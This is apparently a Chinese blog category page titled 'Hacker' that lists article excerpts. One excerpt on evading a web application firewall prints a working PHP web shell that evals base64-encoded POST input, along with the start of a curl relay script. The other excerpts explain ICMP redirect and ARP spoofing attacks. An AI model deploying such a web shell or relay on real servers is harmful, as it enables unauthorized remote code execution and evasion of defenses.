Hacker
文章平均质量分 68
killapper
这个作者很懒,什么都没留下…
展开
-
加密隧道绕过WAF
一下采用base64编码使WAF无法识别接收内容从而达到目的,在必要的情况下发送也要进行编码防止WAF检测到server<?php if($_POST['c']!='') @eval(base64_decode($_POST[z0]));?>tunnel<?php$handle=curl_init();$DATA=array();$DATA=$_POST;$DATA['c']=原创 2015-06-07 10:57:08 · 630 阅读 · 0 评论 -
ICMP重定向攻击
ICMP重定向报文是当主机采用非最优路由发送数据报时,路由器会发回ICMP重定向报文来通知主机最优路由的存在[3]。并且重定向报文必须由路由器生成,当主机作为路由器使用时,必须将其内核配置成可以发送重定向报文。ICMP重定向攻击也可以达到类似ARP欺骗的攻击效果。假设主机A(IP地址为172.16.1.2)经默认路由器(IP地址为172.16.1.1)与另一个网络中的主机D(IP地址为172.转载 2015-06-08 11:50:42 · 15997 阅读 · 0 评论 -
ARP 欺骗+ICMP 重定向
不同于局域网内的 ARP 欺骗,跨网段的 ARP 欺骗一直 是技术难点。有些学者提出可用“ARP 欺骗+ICMP 重定向” 解决[4]。比如,假设网络 1 与网络 2 经一个路由器相联,在 网络 1 内的两台主机 A 和 B 正在通信,网络 2 内的攻击者实 施 ARP 欺骗。 在“ARP 欺骗+ICMP 重定向”这种观点中,攻击者可 先寻找 B 的漏洞当掉 B,然后发送给 A 虚假的 ARP转载 2015-06-08 11:55:47 · 3492 阅读 · 0 评论 -
ARP欺骗
在实际网络的链路上传送数据帧时,是采用硬件地址来寻址,地址解析协议解决了从IP地址到硬件地址的映射问题[1]。比如,源主机欲向本网内的主机发送数据包时,先在源主机的ARP高速缓存中查看有无目的主机的硬件地址,如存在,就将目的主机的硬件地址写入MAC帧并发送,如不存在,源主机自动在网内广播一个ARP请求报文来获得目的主机的硬件地址。网内的所有主机都收到此ARP请求,只有目的主机才会发回一个ARP响应转载 2015-06-08 11:46:25 · 1057 阅读 · 0 评论